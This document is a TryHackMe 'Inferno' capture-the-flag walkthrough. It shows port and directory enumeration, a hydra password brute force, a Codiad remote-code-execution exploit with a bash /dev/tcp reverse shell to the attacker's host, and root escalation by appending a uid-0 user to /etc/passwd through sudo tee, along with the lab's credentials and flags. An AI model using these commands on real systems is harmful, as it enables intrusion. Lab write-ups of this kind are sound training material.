Inferno | TryHackMe Walkthrough
5 min readMar 29, 2023
Locate and find local.txt
Initial foothold
Nmap discovers 2 ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
| 256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
|_ 256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelWeb enumeration
Gobuster discovers a hidden /inferno directory:
┌──(kali㉿kali)-[/data/Inferno]
└─$ gobuster dir -u http://10.10.131.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.131.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/05 14:02:55 Starting gobuster in directory enumeration mode
===============================================================
/inferno (Status: 401) [Size: 460]
/server-status (Status: 403) [Size: 278]
===============================================================
2021/05/05 14:31:32 Finished
===============================================================Brute force the web authentication
Browsing this new resource requires an authentication (HTTP Basic authentication). We can assume that admin would be a valid user, let’s try to brute force the password:
┌──(kali㉿kali)-[/data/Inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.131.118 http-get /inferno
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-05 15:01:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.131.118:80/inferno
[STATUS] 1669.00 tries/min, 1669 tries in 00:01h, 14342730 to do in 143:14h, 16 active
[STATUS] 1760.33 tries/min, 5281 tries in 00:03h, 14339118 to do in 135:46h, 16 active
[STATUS] 1845.43 tries/min, 12918 tries in 00:07h, 14331481 to do in 129:26h, 16 active
[80][http-get] host: 10.10.131.118 login: admin password: dante1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-05 15:09:23Valid combination found: admin:dante1
Codiad
We land to another authentication page, that accepts the same credentials as the HTTP Basic authentication.
We are now in “Codiad”, an online editor.
I tried to modify PHP files and to upload PHP files, but it failed, as we don’t have write privileges.
Exploit
Searching for exploits affecting codiad reveals 3 exploits, 1 of which being an RCE.
┌──(kali㉿kali)-[/data/Inferno]
└─$ searchsploit codiad
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[/data/Inferno/files]
└─$ searchsploit -m 49705
Exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49705
Path: /usr/share/exploitdb/exploits/multiple/webapps/49705.py
File Type: ASCII text, with CRLF line terminatorsCopied to: /data/Inferno/files/49705.pyLet’s start the exploit (notice that you will need to execute the 2 following commands in 2 windows: echo 'bash -c "bash -i >/dev/tcp/10.8.50.72/4445 0>&1 2>&1"' | nc -lnvp 4444 and nc -lnvp 4445)
┌──(kali㉿kali)-[/data/Inferno/files]
└─$ python3 49705.py http://admin:dante1@10.10.64.51/inferno/ admin dante1 10.8.50.72 4444 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/10.8.50.72/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...Now, we have a reverse shell.
┌──(kali㉿kali)-[/data/vpn]
└─$ nc -nlvp 4445
listening on [any] 4445 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.64.51] 34558
bash: cannot set terminal process group (1005): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Inferno:/var/www/html/inferno/components/filemanager$You’ll notice that there is a cronjob that will log you off every minute, so you have to be quick.
Lateral move (www-data -> dante)
Navigating through the files in dante’s home reveals an interesting file under Downloads:
www-data@Inferno:/var/www/html/inferno/components/filemanager$ cd ~/Downloads
cd ~/Downloads
www-data@Inferno:/home/dante/Downloads$ ls -la
ls -la
total 4420
drwxr-xr-x 2 root root 4096 Jan 11 15:29 .
drwxr-xr-x 13 dante dante 4096 Jan 11 15:46 ..
-rw-r--r-- 1 root root 1511 Nov 3 2020 .download.dat
-rwxr-xr-x 1 root root 137440 Jan 11 15:29 CantoI.docx
-rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoII.docx
-rwxr-xr-x 1 root root 88280 Jan 11 15:29 CantoIII.docx
-rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoIV.docx
-rwxr-xr-x 1 root root 133792 Jan 11 15:29 CantoIX.docx
-rwxr-xr-x 1 root root 43224 Jan 11 15:22 CantoV.docx
-rwxr-xr-x 1 root root 133792 Jan 11 15:29 CantoVI.docx
-rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoVII.docx
-rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoX.docx
-rwxr-xr-x 1 root root 121432 Jan 11 15:29 CantoXI.docx
-rwxr-xr-x 1 root root 149080 Jan 11 15:22 CantoXII.docx
-rwxr-xr-x 1 root root 216256 Jan 11 15:22 CantoXIII.docx
-rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoXIV.docx
-rwxr-xr-x 1 root root 141528 Jan 11 15:29 CantoXIX.docx
-rwxr-xr-x 1 root root 88280 Jan 11 15:29 CantoXV.docx
-rwxr-xr-x 1 root root 137440 Jan 11 15:29 CantoXVI.docx
-rwxr-xr-x 1 root root 121432 Jan 11 15:29 CantoXVII.docx
-rwxr-xr-x 1 root root 2351792 Jan 11 15:22 CantoXVIII.docx
-rwxr-xr-x 1 root root 63704 Jan 11 15:29 CantoXX.docx
www-data@Inferno:/home/dante/Downloads$ cat .download.dat | xxd -r -p
cat .download.dat | xxd -r -p
«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».dante:V1rg1l10h3lpm3
The user credentials are revealed at the end of the file.
User flag
At this stage, we can directly connect as dante through SSH using the credentials found just above.
┌──(kali㉿kali)-[/data/Inferno/files]
└─$ ssh dante@10.10.64.51
dante@Inferno:~$ cat local.txt
77f6f3c544ec0811e2d1243e2e0d1835User flag: 77f6f3c544ec0811e2d1243e2e0d1835
Locate and find proof.txt
Checking our privileges reveals that we can execute tee as root with sudo without password.
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/teeLet’s take advantage of this to generate a privileged user:
dante@Inferno:~$ openssl passwd -1 -salt "inferno" "dante"
$1$inferno$vA66L6zp5Qks4kxIc3tvn/
dante@Inferno:~$ printf 'inferno:$1$inferno$vA66L6zp5Qks4kxIc3tvn/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwdSwitch to inferno, our newly created privileged user:
dante@Inferno:~$ su - inferno
Password: dante
root@Inferno:~# cat /root/proof.txt
Congrats!You've rooted Inferno!f332678ed0d0767d7434b8516a7c6144mindsflee
Root flag: f332678ed0d0767d7434b8516a7c6144
Follow me on twitter : ZalaNihir
